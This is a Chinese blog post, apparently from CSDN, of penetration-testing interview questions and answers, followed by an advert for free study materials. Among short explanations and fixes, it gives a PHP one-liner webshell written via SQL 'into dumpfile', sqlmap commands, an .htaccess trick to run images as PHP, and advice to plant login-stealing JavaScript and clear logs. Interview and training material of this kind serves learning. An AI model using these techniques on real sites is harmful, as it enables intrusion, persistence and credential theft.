网络安全渗透面试题汇总

网络安全渗透面试题汇总

说明:星数代表面试出现频率,本文内容持续更新,无法覆盖全部面试问题,建议以点带面学习,查漏补缺。本文已整理PDF版本。

一、渗透测试整体流程

1、拿到一个待检测的站点,优先做什么?

1.1 信息收集

① 获取域名WHOIS信息:注册人、邮箱、姓名、电话等;
② 查询旁站、子域名:主站防护通常较强,旁站更容易存在通用CMS漏洞;
③ 判断服务器操作系统、Web中间件版本,排查已知漏洞(IIS、Apache、Nginx解析漏洞等);
④ IP端口扫描:探测rsync、心脏出血、MySQL、FTP、SSH弱口令等端口风险;
⑤ 扫描网站目录结构:目录遍历、备份文件、php探针等敏感文件泄露;
⑥ Google Hacking:挖掘后台地址、敏感配置文件。

1.2 漏洞扫描

检测常见漏洞:XSS、CSRF、SQL注入、代码执行、命令执行、越权访问、任意文件读取/下载、文件包含、远程命令执行、弱口令、文件上传、编辑器漏洞、暴力破解等。

1.3 漏洞利用

利用漏洞获取WebShell或服务器权限。

1.4 权限提升

  • Windows:MySQL UDF提权、Serv‑U提权、系统内核漏洞(IIS6等)
  • Linux:脏牛漏洞、内核漏洞、MySQL system提权、Oracle低权限提权

1.5 日志清理

1.6 输出报告:漏洞总结 + 修复方案

2、判断网站CMS对渗透测试有什么意义?

  1. 可查找公开披露的对应版本漏洞;
  2. 开源CMS可以下载源码开展代码审计。

3、安全成熟的CMS,扫描目录的作用?
发现敏感文件、二级目录;挖掘站长误操作遗留文件:网站备份压缩包、说明文档;二级目录可能部署其他业务站点。

4、常见Web容器
IIS、Apache、Nginx、Lighttpd、Tomcat

5、MySQL注入点,工具直接写入一句话木马需要什么条件?
数据库root权限 + 网站物理绝对路径。

6、常见容器解析漏洞

  1. IIS 6.0/xx.asp/xx.jpg,把asp文件夹内图片当作asp脚本解析
  2. IIS7.0/7.5:开启Fast‑CGI,图片url后拼接/1.php,图片被当作php解析
  3. Nginx ≤0.8.37:和IIS7原理一致;空字节xxx.jpg.php解析漏洞
  4. Apache:后缀从右向左识别,如test.php.x1.x2.x3,识别php后缀执行
  5. Lighttpdxx.jpg/xx.php解析漏洞

7、快速区分Windows / Linux服务器
Linux区分大小写;Windows不区分大小写。

8、MySQL站点仅对外开放80端口原因?

  1. MySQL端口被修改,未扫描到;
  2. 站库分离部署;
  3. 3306数据库端口内网部署,不对外暴露。

9、无法连接3389远程桌面常见原因

  1. 3389端口未开放;
  2. 远程端口被修改;
  3. 防火墙/安全软件拦截;
  4. 服务器处于内网,需要端口转发。

10、注入字符被转义如何绕过?
宽字节注入、Hex编码绕过。

11、后台新闻编辑页看到富文本编辑器怎么做?
确认编辑器名称与版本,检索对应公开漏洞。

12、WebShell根目录存在.htaccess可以做什么?
修改Apache解析规则,例如配置SetHandler application/x‑httpd‑php,让jpg图片按php脚本解析,隐藏图片马。

13、SQL注入只能获取账号密码吗?
权限足够情况下,可以拖取整个数据库全部数据。

14、安全狗如何发现一句话木马?是否可以绕过?
依靠特征码匹配检测,修改变形代码可以绕过,规则会持续更新。

15、Access数据库.asp文件下载后乱码,本地利用方式
迅雷下载文件,修改后缀为.mdb使用数据库工具打开。

16、提权选择可读写目录,尽量避开带空格目录?
EXP漏洞利用程序执行时依靠空格分割参数,空格目录容易导致命令执行失败。

17、A站点后台新增test用户,访问B站后台也出现该用户?
A、B两个站点共用同一套数据库。

18、注入是否可以跳过and/or/xor,直接order by注入?
and/or只是用来判断注入点是否存在;确认注入点后,可以直接使用order by开展注入。

19、防注入系统记录非法请求IP,如何利用该机制拿Shell?
URL提交一句话木马,恶意语句被存入数据库;寻找网站配置文件,使用菜刀连接执行语句。

20、上传大马访问乱码解决办法?
浏览器切换网页编码。

21、审查上传点前端元素的意义?
部分文件上传校验仅做前端JS限制,修改前端代码即可绕过上传校验。

22、找回密码输入用户名提示“用户不存在”如何利用?

  1. 暴力枚举用户名;
  2. 使用爆破得到的用户名继续爆破密码;

补充:登录页面同样可能返回用户名是否存在;所有和数据库交互的输入点都存在注入风险。

23、下载地址:http://www.test.com/down/down.php?file=/upwdown/1.txt 思路
任意文件下载漏洞。修改file参数读取index.php源码,从源码获取数据库账号密码、配置信息。

24、已知站点/abc/目录包含编辑器与admin后台目录怎么做?
针对二级目录/abc/单独扫描敏感文件与目录。

25、已有WebShell,如何用XSS实现长期控制站点?

  1. 在后台登录页面插入JS脚本,窃取登录账号密码,将数据保存到隐蔽文件或外发至自己服务器;
  2. 在登录鉴权后的页面植入XSS恶意脚本。

26、后台修改密码页面原密码显示星号,读取明文密码方法
F12审查元素,将input标签password属性修改为text,页面直接显示明文。

27、上传图片正常,上传脚本直接返回403原因?
上传目录配置禁止执行脚本,尝试修改文件名后缀绕过限制。

28、如何通过页面判断防护软件?
拦截提示页面、F12查看HTML源码注释、页面隐藏字段会泄露安全产品标识。

29、Win2003创建.zhongzi文件夹作用
特殊隐藏文件夹,存放渗透工具,降低被管理员发现概率。

30、SQL注入二选一:A demo.jsp?id=2+1 B demo.jsp?id=2‑1
选B;URL编码中+代表空格,会造成参数解析异常干扰测试。

31、demo.do?DATA=AjAxNg==变形注入思路
DATA参数经过Base64编码;payload也需要Base64编码之后再传入测试。

32、demo.jsp?uid=110注入点获取WebShell方式,优先方案?

  1. 拥有文件写入权限:into outfile直接写入一句话木马;
  2. sqlmap ‑‑os‑shell,效率最高优先选择;
  3. 联合查询获取管理员账号密码,爆破后台登录,后台模板修改、文件上传拿shell。

二、常见漏洞原理与修复

33、XSS、CSRF、XXE区别和修复方案

  1. XSS跨站脚本:用户可控输入执行JS代码,窃取Cookie等;
    修复:HTML实体转义输出;设置HttpOnly Cookie;输入校验;统一字符编码。
  2. CSRF跨站请求伪造:诱导用户在已登录状态执行非自愿操作;
    修复:请求携带CSRF‑Token;关键操作二次密码校验;校验Referer请求头。
  3. XXE XML外部实体:XML解析调用外部实体读取本地/远程文件;
    修复:关闭XML解析器外部实体解析功能。

34、CSRF、SSRF、重放攻击区别

  • CSRF:客户端浏览器发起伪造请求
  • SSRF:服务器端发起请求伪造,访问内网资源
  • 重放攻击:捕获数据包重复发送,实现冒充身份等目的

35、业务逻辑漏洞举例 + 修复方案

①密码找回漏洞

风险:暴力枚举找回凭证、通用重置token、跳过验证步骤、数据包截取获取重置凭证。
修复:token设置短有效期,一次失效;校验完整身份;禁止暴力枚举。

②身份认证漏洞

会话固定攻击、Cookie/Session伪造。
修复:登录刷新Session;禁止Cookie明文泄露;合理设置会话有效期。

③验证码漏洞

验证码可暴力爆破、前端JS绕过、抓包修改绕过。
修复:验证码服务端校验;限制错误次数;验证码一次性失效。

36、HTTP数据包安全分析

get /ecskins/demo.jsp uid=2016031900&keyword="hello world"
HTTP/1.1
Host:.com:82
User‑Agent:Mozilla/5.0 Firefox/40
Accept:text/css,*/*;q=0.1
Accept‑Language:zh‑CN;zh;q=0.8;en‑US;q=0.5,en;q=0.3
Referer:http://**.com/eciop/orderForCC/cgtListForCC.htm zone=11370601&v=145902
Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;
uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;
st_uid=N90PLYHLZGJXI‑NX01VPUF46W;
status=True
Connection:keep‑alive

风险点:

  • uid、keyword参数用户可控,存在 SQL 注入、XSS 风险;
  • Cookie 无 HttpOnly 标记,容易被 XSS 窃取会话;
  • Referer 可被伪造,仅依靠 Referer 防御 CSRF 不安全;
  • status=True状态直接放在 Cookie,可被篡改越权。

37、sqlmap 使用方法

  • GET 注入:sqlmap -u "注入url"
  • POST 注入:sqlmap -u "url" --data="post参数"
  • Cookie/XFF 等头部注入:Burp 抓包保存文件,sqlmap -r 文件名

38、SQL 注入类型

  • 报错注入
  • Bool 布尔盲注
  • 时间延时盲注
  • 宽字节注入

39、延时注入判断逻辑
if(ascii(substr("hello", 1, 1))=104, sleep(5), 1),匹配成功页面延时 5 秒返回。

40、盲注和延时注入共同点
逐字符比对数据,不能直接返回查询结果。

41、获取 WebShell 的途径
文件上传、后台模板编辑、SQL 注入写文件、代码 / 命令执行漏洞、已知 CMS 漏洞(dedecms、wordpress 插件漏洞)。

42、MySQL 报错注入常用函数(10 个)

  1. extractvalue()
  2. floor()
  3. updatexml()
  4. geometrycollection()
  5. multipoint()
  6. polygon()
  7. multipolygon()
  8. linestring()
  9. multilinestring()
  10. exp()

43、<img>标签除onerror外获取管理员 Referer 思路
src指向外部服务器脚本,访问时自动带上 Referer 来源页面。

44、<img>src 强制后缀.jpg获取 Referer
远程服务器修改 Apache 配置,.jpg后缀当作 php 脚本解析:AddType application/x‑httpd‑php .jpg<img src=http://xss.tv/1.jpg>执行 PHP 代码拿到 Referer。

45、SQL 写入文件函数

  • into outfile:适合导出普通数据;
  • into dumpfile:适合写入二进制脚本木马。

示例:

select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php'; 

46、CSRF 防御手段

  • 校验 Referer 请求头;
  • 请求加入随机 Token,服务端校验。

47、OWASP Top10 漏洞清单

  1. SQL 注入
  2. 失效身份认证与会话管理
  3. 跨站脚本 XSS
  4. 不安全的直接对象引用
  5. 安全配置错误
  6. 敏感信息泄露
  7. 缺失功能级访问控制
  8. 跨站请求伪造 CSRF
  9. 使用存在漏洞的第三方组件
  10. 未验证重定向与跳转

48、SQL 注入防护措施

  • 使用预编译安全 API;
  • 输入特殊字符转义处理;
  • 白名单校验输入;
  • 服务端统一过滤特殊危险字符。

49、PHP 危险函数汇总

  • 代码执行:eval、preg_replace+/e、assert、call_user_func、call_user_func_array、create_function
  • 文件读取:file_get_contents、highlight_file、fopen、readfile、fread、fgets、parse_ini_file、show_source、file
  • 命令执行:system、exec、shell_exec、passthru、pcntl_exec、popen、proc_open

结语

网络安全行业如同江湖,国内很多安全人员擅长漏洞挖掘利用,但底层密码学、系统工程基础薄弱。未来行业更需要懂安全体系建设、结合业务与数据安全的正向安全人才,补足人才缺口,保障互联网业务安全。


最后

关于网络安全技术储备

网络安全是当今信息时代中非常重要的一环。无论是找工作还是感兴趣(黑客),都是未来职业选择中上上之选,为了保护自己的网络安全,学习网络安全知识是必不可少的。

如果你是准备学习网络安全(黑客)或者正在学习,下面这些你应该能用得上:

①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

一、网络安全(黑客)学习路线

网络安全(黑客)学习路线,形成网络安全领域所有的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。

在这里插入图片描述

二、网络安全教程视频

我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。

三、网络安全CTF实战案例

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这里带来的是CTF&SRC资料&HW资料,毕竟实战是检验真理的唯一标准嘛~

img

四、网络安全面试题

最后,我们所有的作为都是为就业服务的,所以关键的临门一脚就是咱们的面试题内容,所以面试题板块是咱们不可或缺的部分,这里我给大家准备的就是我在面试期间准备的资料。

在这里插入图片描述

网安其实不难,难的是坚持和相信自己,我的经验是既然已经选定网安你就要相信它,相信它能成为你日后进阶的高效渠道,这样自己才会更有信念去学习,才能在碰到困难的时候坚持下去。

机会属于有准备的人,这是一个实力的时代。人和人之间的差距不在于智商,而在于如何利用业余时间,只要你想学习,什么时候开始都不晚,不要担心这担心那,你只需努力,剩下的交给时间!

这份完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

img

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值